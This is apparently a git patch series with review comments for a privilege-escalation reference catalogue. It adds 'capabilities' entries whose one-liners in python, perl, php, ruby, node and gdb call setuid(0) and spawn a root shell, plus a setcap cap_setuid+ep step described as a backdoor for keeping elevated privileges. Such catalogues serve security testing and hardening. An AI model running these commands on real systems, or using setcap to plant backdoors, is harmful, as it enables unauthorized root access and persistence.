From 1afd9ec9ec9b73ee27726edbd7ab1ddeb17d8742 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 21:29:53 +0100 Subject: [PATCH 1/5] Drafting capabilities --- _data/functions.yml | 7 +++++++ _gtfobins/python2.md | 2 ++ _layouts/bin.html | 4 ++++ 3 files changed, 13 insertions(+) diff --git a/_data/functions.yml b/_data/functions.yml index f9b662f..adc13a1 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -62,6 +62,13 @@ load-library: It loads shared libraries that may be used to run code in the binary execution context. +capabilities-enabled: + label: Capabilities + description: | + It can manipulate its process UID and in Linux systems it can be set with the + `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. + This also works if the binary is invoked by another binary with the capability set. + suid-enabled: label: SUID description: | diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index d82049c..5f6e73a 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -30,6 +30,8 @@ functions: - code: python2 -c 'open("file_to_read").read()' load-library: - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + capabilities-enabled: + - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' suid-enabled: - code: ./python2 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: diff --git a/_layouts/bin.html b/_layouts/bin.html index 47e5e30..19b6039 100644 --- a/_layouts/bin.html +++ b/_layouts/bin.html @@ -30,6 +30,10 @@ layout: common cp $(which {{ bin_name }}) . sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}' {% endif %} +{%- if function_name == 'capabilities-enabled' %} +cp $(which {{ bin_name }}) . +sudo setcap cap_setuid+ep {{ bin_name }} +{% endif %} {{ example.code }} {% endcapture %} From e72d7e3d19ab50e2986b6e5f64f5edf14f145044 Mon Sep 17 00:00:00 2001 
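Review bot: The last sentence of the new `capabilities-enabled` description in `_data/functions.yml` overstates how far the capability carries: on execve a process does not inherit a capability merely because its parent holds it, only file capabilities on the executed binary or the inheritable/ambient sets transfer (capabilities(7)), so "This also works if the binary is invoked by another binary with the capability set" is misleading unless qualified. The first sentence also reads awkwardly; suggest `It can manipulate its own process UID and, on Linux, can be given the CAP_SETUID file capability (e.g. via setcap) so that it works as a backdoor to maintain elevated privileges.` and either dropping the last sentence or qualifying it with "when the capability is passed through the inheritable or ambient set". The same text is moved unchanged in patch 2/5, so the wording fix applies there as well.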
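Review bot: The new `capabilities-enabled` branch in `_layouts/bin.html` runs `sudo setcap cap_setuid+ep {{ bin_name }}` on a bare name, while the `suid-enabled` branch just above it addresses the copied file as `./{{ bin_name }}`. setcap treats its argument as a path relative to the working directory, so the copy is still the target, but the inconsistency makes the snippet read as if the system binary might be modified. For consistency and clarity use `sudo setcap cap_setuid+ep ./{{ bin_name }}`.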
From: Emilio Pinna Date: Wed, 12 Sep 2018 21:56:42 +0100 Subject: [PATCH 2/5] Reorder functions --- _data/functions.yml | 14 +++++++------- _gtfobins/python2.md | 4 ++-- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/_data/functions.yml b/_data/functions.yml index adc13a1..98282a9 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -62,13 +62,6 @@ load-library: It loads shared libraries that may be used to run code in the binary execution context. -capabilities-enabled: - label: Capabilities - description: | - It can manipulate its process UID and in Linux systems it can be set with the - `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. - This also works if the binary is invoked by another binary with the capability set. - suid-enabled: label: SUID description: | @@ -83,6 +76,13 @@ sudo-enabled: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`. +capabilities-enabled: + label: Capabilities + description: | + It can manipulate its process UID and in Linux systems it can be set with the + `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. + This also works if the binary is invoked by another binary with the capability set. + suid-limited: label: Limited SUID description: | diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index 5f6e73a..b019cdd 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md 
@@ -30,10 +30,10 @@ functions: - code: python2 -c 'open("file_to_read").read()' load-library: - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - capabilities-enabled: - - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' suid-enabled: - code: ./python2 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - code: sudo python2 -c 'import os; os.system("/bin/sh")' + capabilities-enabled: + - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' --- From c7375411b7c601509d15310b83e8086d078604b1 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 21:57:04 +0100 Subject: [PATCH 3/5] Add capabilities to perl, php, python3, and ruby --- _gtfobins/perl.md | 2 ++ _gtfobins/php.md | 4 ++++ _gtfobins/python3.md | 2 ++ _gtfobins/ruby.md | 2 ++ 4 files changed, 10 insertions(+) diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index d3c0e0f..d12e1f8 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -12,4 +12,6 @@ functions: - code: ./perl -e 'exec "/bin/sh";' sudo-enabled: - code: sudo perl -e 'exec "/bin/sh";' + capabilities-enabled: + - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' --- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 05f41ea..7acdeb1 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -46,4 +46,8 @@ functions: - code: | CMD="/bin/sh" sudo php -r "system('$CMD');" + capabilities-enabled: + - code: | + CMD="/bin/sh" + ./php -r "posix_setuid(0); system('$CMD');" --- diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index d340df1..d71c0a4 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -34,4 +34,6 @@ functions: - code: ./python3 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - code: sudo python3 -c 'import os; os.system("/bin/sh")' + capabilities-enabled: + - code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 65c0d3c..1fe9fdb 100644 
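Review bot: In the new `capabilities-enabled` entry for `_gtfobins/perl.md`, `use POSIX qw(setuid); POSIX::setuid(0);` imports `setuid` into the current package and then calls it fully qualified anyway, so the import list is dead weight. Either `use POSIX qw(setuid); setuid(0);` or `use POSIX; POSIX::setuid(0);` expresses the intent in a single form; pick one rather than mixing both.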
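Review bot: The new `capabilities-enabled` entry for `_gtfobins/php.md` relies on `posix_setuid()`, which lives in PHP's optional `posix` extension and is absent on builds configured with `--disable-posix`, yet the entry carries no caveat. The gdb entry in patch 5/5 shows the pattern for this with its `description:` field; suggest adding `description: Only if the posix extension is enabled.` above the `code:` so the constraint is visible on the rendered page.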
--- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -29,4 +29,6 @@ functions: - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' sudo-enabled: - code: sudo ruby -e 'exec "/bin/sh"' + capabilities-enabled: + - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' --- From 73149878009309e723e0dc40340639a7a1662780 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 22:02:05 +0100 Subject: [PATCH 4/5] Add capabilities to node --- _gtfobins/node.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 622f2bf..64c1dd4 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -30,4 +30,7 @@ functions: sudo-enabled: - code: | sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' + capabilities-enabled: + - code: | + ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' --- From aed737131ca63ad6d273ad4918eae78b3775f0ed Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 13 Sep 2018 14:44:59 +0200 Subject: [PATCH 5/5] Add capabilities to gdb --- _gtfobins/gdb.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md index 984d42e..34b1364 100644 --- a/_gtfobins/gdb.md +++ b/_gtfobins/gdb.md @@ -12,4 +12,7 @@ functions: gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit sudo-enabled: - code: sudo gdb -nx -ex '!sh' -ex quit + capabilities-enabled: + - description: Only if it has been compiled with Python support. + code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit ---